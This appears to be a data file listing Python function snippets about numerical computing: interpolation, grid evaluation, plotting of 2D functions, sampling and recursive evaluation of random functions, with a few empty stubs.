"def evaluate_1darray_function_on_2d_array(function, samples, opts=None):\n num_args = get_num_args(function)\n assert samples.ndim == 2\n num_samples = samples.shape[1]\n if num_args == 2:\n values_0 = function(samples[:, 0], opts)\n else:\n values_0 = function(samples[:, 0])\n values_0 = np.atleast_1d(values_0)\n assert values_0.ndim == 1\n num_qoi = values_0.shape[0]\n values = np.empty((num_samples, num_qoi), float)\n values[0, :] = values_0\n for i in range(1, num_samples):\n if num_args == 2:\n values[i, :] = function(samples[:, i], opts)\n else:\n values[i, :] = function(samples[:, i])\n\n return values",
"def draw2 ( self ,\n dataset = None ,\n nbins = 100 ,\n silent = True ,\n in_range = None ,\n args = () , **kwargs ) :\n if in_range and isinstance ( in_range , tuple ) and 2 == len ( in_range ) :\n range_name = 'aux2_rng1_%s' % self.name \n with rooSilent ( 3 ) : \n self.xvar.setRange ( range_name , in_range[0] , in_range[1] )\n if dataset:\n dataset.get_var(self.xvar.GetName()).setRange ( range_name , in_range[0] , in_range[1] )\n\n in_range = range_name\n\n return self.draw ( drawvar = self.yvar ,\n dataset = dataset ,\n nbins = nbins ,\n ybins = 20 , ## fake\n silent = silent ,\n in_range = in_range ,\n args = args , **kwargs )",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def function2D(self, t):\n if t.ndim == 1:\n nX = int(self.getAttributeValue('nX'))\n nY = int(self.getAttributeValue('nY'))\n pos = t.reshape(nX, nY, 2)\n elif t.ndim == 3:\n pos = t\n X = pos[...,0]\n Y = pos[...,1]\n A = self.getParamValue(0)\n muX = self.getParamValue(1)\n muY = self.getParamValue(2)\n sigX = self.getParamValue(3)\n sigY = self.getParamValue(4)\n sigP = self.getParamValue(5)\n bg = self.getParamValue(6)\n\n sigXY = sigX*sigY*sigP\n Z = A*bivariate_normal(X,Y, sigmax=sigX, sigmay=sigY,\n mux=muX,muy=muY,sigmaxy=sigXY)\n Z += bg\n return Z",
"def plot(\n self,\n function: Callable[[float], float],\n x_range: Sequence[float] | None = None,\n use_vectorized: bool = False,\n **kwargs,\n ):\n\n t_range = np.array(self.x_range, dtype=float)\n if x_range is not None:\n t_range[: len(x_range)] = x_range\n\n if x_range is None or len(x_range) < 3:\n # if t_range has a defined step size, increase the number of sample points per tick\n t_range[2] /= self.num_sampled_graph_points_per_tick\n # For axes, the third coordinate of x_range indicates\n # tick frequency. But for functions, it indicates a\n # sample frequency\n\n graph = ParametricFunction(\n lambda t: self.coords_to_point(t, function(t)),\n t_range=t_range,\n scaling=self.x_axis.scaling,\n use_vectorized=use_vectorized,\n **kwargs,\n )\n graph.underlying_function = function\n return graph",
"def function_to_XYs(func, fpars,\n Egrid=equal_bins(100),\n domainUnit='eV', domainName='energy_in', rangeUnit='b', rangeName='crossSection',\n accuracy=upperEps):\n return XYs1dModule.XYs1d.createFromFunction(\n XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: (rangeName, rangeUnit),\n XYs1dModule.xAxisIndex: (domainName, domainUnit)}),\n Xs=Egrid,\n func=func,\n parameters=fpars,\n accuracy=accuracy,\n biSectionMax=20,\n checkForRoots=False,\n infill=1,\n safeDivide=1)",
"def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)",
"def fillax(x, y, *args, **kw):\n xx = np.concatenate((x, np.array([x[-1], x[0]], x.dtype)))\n yy = np.concatenate((y, np.zeros(2, y.dtype)))\n return pylab.fill(xx, yy, *args, **kw)",
"def draw_f():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n x_matrix = np.arange(-10, 11, 0.1)\n y_matrix = np.arange(-10, 11, 0.1)\n x_matrix, y_matrix = np.meshgrid(x_matrix, y_matrix)\n # print(x_matrix)\n u_matrix = x_matrix.copy()\n for i in range(x_matrix.shape[0]):\n for j in range(x_matrix.shape[0]):\n u_matrix[i][j] = f(x_matrix[i][j], y_matrix[i][j])\n surf = ax.plot_surface(x_matrix, y_matrix, u_matrix)\n\n plt.show()\n return surf",
"def make_plot(x,y):",
"def plot_response_surface(f, p, dims=[0,1]):\n import pylab\n if len(dims) == 1:\n xi = dims[0]\n x = pylab.linspace(-10,10,40) - p[xi]\n def value(v):\n p[xi] = v\n return f(p)\n z = [value(v) for v in x]\n pylab.plot(x,z)\n else:\n xi,yi = dims\n x = pylab.linspace(-10,10,40) - p[xi]\n y = pylab.linspace(-10,10,40) - p[yi]\n def value(pt):\n p[xi] = pt[0]\n p[yi] = pt[1]\n return f(p)\n z = np.array([[value((v,w)) for v in x] for w in y])\n pylab.pcolor(x,y,z)",
"def interp_2d(_x, _y, _x_min, _x_step, _nx, _y_min, _y_step, _ny, _ar_f, _ord=3, _ix_per=1, _ix_ofst=0):\r\n if(_ord == 1): #bi-linear interpolation based on 4 points\r\n ix0 = int(trunc((_x - _x_min)/_x_step + 1.e-09))\r\n if(ix0 < 0):\r\n ix0 = 0\r\n elif(ix0 >= _nx - 1):\r\n ix0 = _nx - 2\r\n ix1 = ix0 + 1\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n \r\n iy0 = int(trunc((_y - _y_min)/_y_step + 1.e-09))\r\n if(iy0 < 0):\r\n iy0 = 0\r\n elif(iy0 >= _ny - 1):\r\n iy0 = _ny - 2\r\n iy1 = iy0 + 1\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = f10 - a00\r\n a01 = f01 - a00\r\n a11 = a00 - f01 - f10 + f11\r\n return a00 + tx*(a10 + ty*a11) + ty*a01\r\n\r\n elif(_ord == 2): #bi-quadratic interpolation based on 6 points\r\n ix0 = int(round((_x - _x_min)/_x_step))\r\n if(ix0 < 1):\r\n ix0 = 1\r\n elif(ix0 >= _nx - 1):\r\n ix0 = _nx - 2\r\n ixm1 = ix0 - 1\r\n ix1 = ix0 + 1\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n\r\n iy0 = int(round((_y - _y_min)/_y_step))\r\n if(iy0 < 1):\r\n iy0 = 1\r\n elif(iy0 >= _ny - 1):\r\n iy0 = _ny - 2\r\n iym1 = iy0 - 1\r\n iy1 = iy0 + 1\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iym1_nx_ix_per = iym1*nx_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n ixm1_ix_per_p_ix_ofst = ixm1*_ix_per + _ix_ofst\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n fm10 = _ar_f[iy0_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f0m1 = _ar_f[iym1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = 0.5*(f10 - fm10)\r\n a01 = 0.5*(f01 - f0m1)\r\n a11 = a00 - f01 - f10 + f11\r\n a20 = 0.5*(f10 + fm10) - a00\r\n a02 = 0.5*(f01 + f0m1) - a00\r\n return a00 + tx*(a10 + tx*a20 + ty*a11) + ty*(a01 + ty*a02)\r\n \r\n elif(_ord == 3): #bi-cubic interpolation based on 12 points\r\n ix0 = int(trunc((_x - _x_min)/_x_step + 1.e-09))\r\n if(ix0 < 1):\r\n ix0 = 1\r\n elif(ix0 >= _nx - 2):\r\n ix0 = _nx - 3\r\n ixm1 = ix0 - 1\r\n ix1 = ix0 + 1\r\n ix2 = ix0 + 2\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n\r\n iy0 = int(trunc((_y - _y_min)/_y_step + 1.e-09))\r\n if(iy0 < 1):\r\n iy0 = 1\r\n elif(iy0 >= _ny - 2):\r\n iy0 = _ny - 3\r\n iym1 = iy0 - 1\r\n iy1 = iy0 + 1\r\n iy2 = iy0 + 2\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iym1_nx_ix_per = iym1*nx_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n iy2_nx_ix_per = iy2*nx_ix_per\r\n ixm1_ix_per_p_ix_ofst = ixm1*_ix_per + _ix_ofst\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n ix2_ix_per_p_ix_ofst = ix2*_ix_per + _ix_ofst\r\n f0m1 = _ar_f[iym1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f1m1 = _ar_f[iym1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n fm10 = _ar_f[iy0_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f20 = _ar_f[iy0_nx_ix_per + ix2_ix_per_p_ix_ofst]\r\n fm11 = _ar_f[iy1_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f21 = _ar_f[iy1_nx_ix_per + ix2_ix_per_p_ix_ofst]\r\n f02 = _ar_f[iy2_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f12 = _ar_f[iy2_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = -0.5*a00 + f10 - f20/6 - fm10/3\r\n a01 = -0.5*a00 + f01 - f02/6 - f0m1/3\r\n a11 = -0.5*(f01 + f10) + (f02 - f12 + f20 - f21)/6 + (f0m1 - f1m1 + fm10 - fm11)/3 + f11\r\n a20 = -a00 + 0.5*(f10 + fm10)\r\n a02 = -a00 + 0.5*(f01 + f0m1)\r\n a21 = a00 - f01 + 0.5*(f11 - f10 - fm10 + fm11)\r\n a12 = a00 - f10 + 0.5*(f11 - f01 - f0m1 + f1m1)\r\n a30 = 0.5*(a00 - f10) + (f20 - fm10)/6\r\n a03 = 0.5*(a00 - f01) + (f02 - f0m1)/6\r\n a31 = 0.5*(f01 + f10 - f11 - a00) + (f21 + fm10 - f20 - fm11)/6\r\n a13 = 0.5*(f10 - f11 - a00 + f01) + (f0m1 + f12 - f02 - f1m1)/6\r\n return a00 + tx*(a10 + tx*(a20 + tx*(a30 + ty*a31) + ty*a21) + ty*a11) + ty*(a01 + ty*(a02 + ty*(a03 + tx*a13) + tx*a12))\r\n return 0",
"def apply_se_corr2D(x, y, lx, f):\n if( x.shape != y.shape or x.shape != f.shape):\n print (x.shape)\n print (y.shape)\n print (f.shape)\n raise ValueError(\"Incompatible shape of coordinates arrays\")\n #\n nx = x.shape[0]\n ny = x.shape[1]\n #\n g = np.zeros_like(f)\n two_lx2 = 2.0*lx*lx\n #\n for i in range(nx):\n for j in range(ny):\n coef_sum = 0\n for k1 in range(nx):\n for k2 in range(ny):\n dx = x[k1,k2] - x[i,j]\n dy = y[k1,k2] - y[i,j]\n coef = np.exp( -(dx*dx+dy*dy)/two_lx2 )\n g[i,j] = g[i,j] + coef*f[k1,k2]\n coef_sum = coef_sum + coef\n pass # k2\n pass #k1\n # Normalization if needed\n g[i,j] = g[i,j]/coef_sum\n pass # j\n pass # i\n return g",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def function_to_surface (x, y, func, hist=False):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n xbins = np.r_[x - dx/2., x[-1] + dx/2.]\n ybins = np.r_[y - dy/2., y[-1] + dy/2.]\n values = np.vectorize (func) (*np.meshgrid (x, y)).T\n if hist:\n return Hist2D (xbins, ybins, values)\n else:\n return Surface2D (xbins, ybins, values)",
"def evaluate_random_function(f, x, y):\n\n # your code goes here",
"def evaluate_random_function(f, x, y):\n if (f[0]=='x'):\n return X(x,y)\n elif (f[0]=='y'):\n return Y(x,y)\n elif (f[0]=='sin_pi'):\n return sin_pi(evaluate_random_function(f[1],x,y))\n elif (f[0]=='cos_pi'):\n return cos_pi(evaluate_random_function(f[1],x,y))\n elif (f[0]=='times'):\n return times(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n elif (f[0]=='root'):\n return root(evaluate_random_function(f[1],x,y))\n elif (f[0]=='square'):\n return square(evaluate_random_function(f[1],x,y))",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def create_derivative_graph(f, xrange, n):\n plot_points = []\n for x in xrange:\n plot_points.append(nth_derivative(f, x, n))\n return plot_points",
"def draw1 ( self ,\n dataset = None ,\n nbins = 100 ,\n silent = True ,\n in_range = None ,\n args = () , **kwargs ) :\n if in_range and isinstance ( in_range , tuple ) and 2 == len ( in_range ) :\n range_name = 'aux2_rng2_%s' % self.name \n with rooSilent ( 3 ) : \n self.yvar.setRange ( range_name , in_range[0] , in_range[1] )\n if dataset:\n dataset.get_var(self.yvar.GetName()).setRange ( range_name , in_range[0] , in_range[1] )\n\n in_range = range_name \n\n return self.draw ( drawvar = self.xvar , \n dataset = dataset ,\n nbins = nbins ,\n ybins = 20 , ## fake \n silent = silent ,\n in_range = in_range ,\n args = args , **kwargs )",
"def sampleFunction(x: int, y: float) -> float:\n return x * y",
"def plot(f,**kw):\n if type(f)==tuple:\n x,y=f\n pl.plot(x,y,**kw)\n else:\n pl.plot(f,**kw)",
"def d_func(x, y):\n return np.array((2.0 * (x - 1) - 400.0 * x * (y - x**2), 200.0 * (y - x**2)))",
"def l2_dist_list(list_func, range_x, func_ref = None):\n if(func_ref is None):\n func_ref = list_func[0]\n \n l2_dists = [pFunc_base.square_dist(func_ref, f) for f in list_func] \n return l2_dists",
"def f(x, y):\n return Ripple.g(np.sqrt(x ** 2 + y ** 2))",
"def vis_data(data, f1,f2):\n hist = np.histogram2d(data[:, f2], data[:, f1], bins=100, range=[lims, lims])\n plt.pcolormesh(hist[1], hist[2], hist[0], alpha=0.5)",
"def filt2(X, yvals, xvals, ny, nx):\n\n Y = dofilter2(X,nx,ny)\n \n Xnew = dofilter2(X,nx%2,ny%2)\n xvalsnew = dofilter2(xvals,ny%2,nx%2)\n yvalsnew = dofilter2(yvals,ny%2,nx%2)\n\n return Xnew, Y, yvalsnew, xvalsnew",
"def eulers_method(f, y, dx, range):\n x = min(range)\n y_space = [y]\n x_space = [x]\n while x<=max(range):\n y += f(x, y)*dx\n x += dx\n x_space.append(x)\n y_space.append(y)\n return (x_space, y_space)",
"def makeCrossPlot(f,g):\n s = fillfloat(shiftDrv,n1,n2)\n fs = applyShifts(f,s)\n gs = applyShifts(g,s)\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(n1):\n x[i2][i1] = 0.5*(fs[i2][i1]+gs[i2][i1])-0.5*(f[i2][i1]+g[i2][i1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def brute(f, ranges, args=(), Ns=3, full_output=False):\n # Generate the parameter space\n lrange = list(ranges)\n N = len(ranges)\n for k in range(N):\n low, high = lrange[k]\n lrange[k] = np.linspace(low, high, Ns)\n xs = np.array(np.meshgrid(*lrange)).T.reshape(-1, N)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def plot_functions(phi_orthonormalized_list, start_index, interval):\n\n # Run plot settings\n plot_settings()\n\n # Axis\n t_array = numpy.logspace(-7, numpy.log10(interval[1]), 1000)\n\n # Evaluate functions\n num_functions = len(phi_orthonormalized_list)\n\n f = numpy.zeros((num_functions, t_array.size), dtype=float)\n for j in range(num_functions):\n f_lambdify = sympy.lambdify(t, phi_orthonormalized_list[j], 'numpy')\n f[j, :] = f_lambdify(t_array)\n\n # Plot\n fig, ax = plt.subplots(figsize=(7, 4.8))\n for j in range(num_functions):\n ax.semilogx(t_array, f[j, :],\n label=r'$i = %d$' % (j+start_index))\n\n ax.legend(ncol=3, loc='lower left', borderpad=0.5, frameon=False)\n ax.set_xlim([t_array[0], t_array[-1]])\n ax.set_ylim([-1, 1])\n ax.set_yticks([-1, 0, 1])\n ax.set_xlabel(r'$t$')\n ax.set_ylabel(r'$\\phi_i^{\\perp}(t)$')\n ax.set_title('Orthogonalized inverse-monomial functions')\n ax.grid(axis='y')\n\n # Get the root directory of the package (parent directory of this script)\n file_dir = os.path.dirname(os.path.realpath(__file__))\n parent_dir = os.path.dirname(file_dir)\n second_parent_dir = os.path.dirname(parent_dir)\n\n # Try to save in the docs/images directory. Check if exists and writable\n save_dir = os.path.join(second_parent_dir, 'docs', 'images')\n if (not os.path.isdir(save_dir)) or (not os.access(save_dir, os.W_OK)):\n\n # Write in the current working directory\n save_dir = os.getcwd()\n\n # Save plot in both svg and pdf format\n if os.access(save_dir, os.W_OK):\n save_fullename_svg = os.path.join(save_dir, 'orthogonal_functions.svg')\n save_fullename_pdf = os.path.join(save_dir, 'orthogonal_functions.pdf')\n plt.savefig(save_fullename_svg, transparent=True, bbox_inches='tight')\n plt.savefig(save_fullename_pdf, transparent=True, bbox_inches='tight')\n print('')\n print('Plot saved to \"%s\".' % (save_fullename_svg))\n print('Plot saved to \"%s\".' % (save_fullename_pdf))\n else:\n print('Cannot save plot to %s. Directory is not writable.' % save_dir)\n\n # If no display backend is enabled, do not plot in the interactive mode\n if matplotlib.get_backend() != 'agg':\n plt.show()",
"def _estimate_inverse_function(f, samples, f_domain=None, endpoints=None):\n if f_domain is None:\n f_domain = f.domain\n xs = np.linspace(*f_domain, samples)\n ys = [f(x) for x in xs]\n if endpoints is not None:\n fa, fb = endpoints\n if fa is not None:\n ys[0] = fa\n if fb is not None:\n ys[-1] = fb\n ys, xs = _filter_nonmonotone_data_points(ys, xs)\n if ys[0] > ys[-1]: # reversed order\n ys = list(reversed(ys))\n xs = list(reversed(xs))\n # PchipInterpolator guarantees monotonicity of interpolant\n interp = PchipInterpolator(ys, xs, extrapolate=True)\n return interp",
"def evaluate_random_function(f, x, y):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi', 'square', 'root']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n\n # Kindof effort instensive way to do this, but it allows for a\n # changeable list of functions with less effort\n else:\n if f[0] == elementary_func[0]:\n first_argument = evaluate_random_function(f[1], x, y)\n second_argument = evaluate_random_function(f[2], x, y)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = evaluate_random_function(f[1], x, y)\n second_argument = evaluate_random_function(f[2], x, y)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = evaluate_random_function(f[1], x, y)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = evaluate_random_function(f[1], x, y)\n ans = math.sin(math.pi * argument)\n return ans\n elif f[0] == elementary_func[4]:\n argument = evaluate_random_function(f[1], x, y)\n return argument**2\n elif f[0] == elementary_func[5]:\n argument = evaluate_random_function(f[1], x, y)\n return math.sqrt(math.fabs(argument))",
"def test_linear_interpolation_range(self):\n\n for x in [[1.0, 2.0, 4.0], [-20, -19, 0], numpy.arange(200) + 1000]:\n for y in [[5.0, 9.0], [100, 200, 10000]]:\n\n # Define ny by nx array with corresponding values\n A = numpy.zeros((len(x), len(y)))\n\n # Define values for each x, y pair as a linear function\n for i in range(len(x)):\n for j in range(len(y)):\n A[i, j] = linear_function(x[i], y[j])\n\n # Test that linearly interpolated points are correct\n xis = numpy.linspace(x[0], x[-1], 100)\n etas = numpy.linspace(y[0], y[-1], 100)\n points = combine_coordinates(xis, etas)\n\n vals = interpolate2d(x, y, A, points, mode='linear')\n refs = linear_function(points[:, 0], points[:, 1])\n assert numpy.allclose(vals, refs, rtol=1e-12, atol=1e-12)",
"def compute_2pcf_2D(xs, ys, bins=10):\n # seps has shape (N, N) up to ind\n # calculate the euclidean separation between each point in the process\n seps = distance_map(xs, xs)\n\n # pps0, pps1 have shape (N, N) up to ind\n # calculate the pair products of each component of each point of the process\n pps = product_map(ys, ys)\n pps0 = pps[:,:,0]\n pps1 = pps[:,:,1]\n\n # ``upper triangle`` indices for an (N, N) array\n ind = np.triu_indices(seps.shape[0])\n\n # Use histograms to efficiently select pps according to sep\n # Inspired by Gary Bernstein via Pierre-Francois Leget\n counts, dr = np.histogram(seps[ind], bins=bins)\n xi0, _ = np.histogram(seps[ind], bins=bins, weights=pps0[ind])\n xi1, _ = np.histogram(seps[ind], bins=bins, weights=pps1[ind])\n\n # Normalize quantities\n dr = 0.5*(dr[:-1]+dr[1:])\n xi0 /= counts\n xi1 /= counts\n\n return dr, xi0, xi1",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)",
"def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]",
"def monte_carlos(f, ranges, args=(), Ns=1000, full_output=False):\n # Generate the parameter space\n np.random.seed(17)\n lrange = list(ranges)\n N = len(ranges)\n xs = np.zeros((Ns, N))\n for k in range(N):\n low, high = lrange[k]\n xs[:, k] = np.random.uniform(low, high, Ns)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def f(x):\r\n return x * np.sin(x)",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def f(x):\r\n\treturn np.sin(x)",
"def lin_gaus_2d(x, y, A, mu_x, sigma_x, mu_y, sigma_y, m, b):\n return A * np.exp(-((x-mu_x)**2/(2.*sigma_x**2)+(y-mu_y)**2/(2.*sigma_y**2))) + y*m + b",
"def sfunc(self,x,y):\n return np.exp(-(x-self.x_0)**2.0-(y-self.y_0)**2.0)",
"def evaluate_random_function(f, x, y):\n\n if f[0] == \"prod\":\n return evaluate_random_function(f[1],x,y) * evaluate_random_function(f[2],x,y)\n elif f[0] == \"sin_pi\":\n return sin(evaluate_random_function(f[1],x,y) * pi)\n elif f[0] == \"cos_pi\":\n return cos(evaluate_random_function(f[1],x,y) * pi)\n elif f[0] == \"x\":\n return x\n else:\n return y",
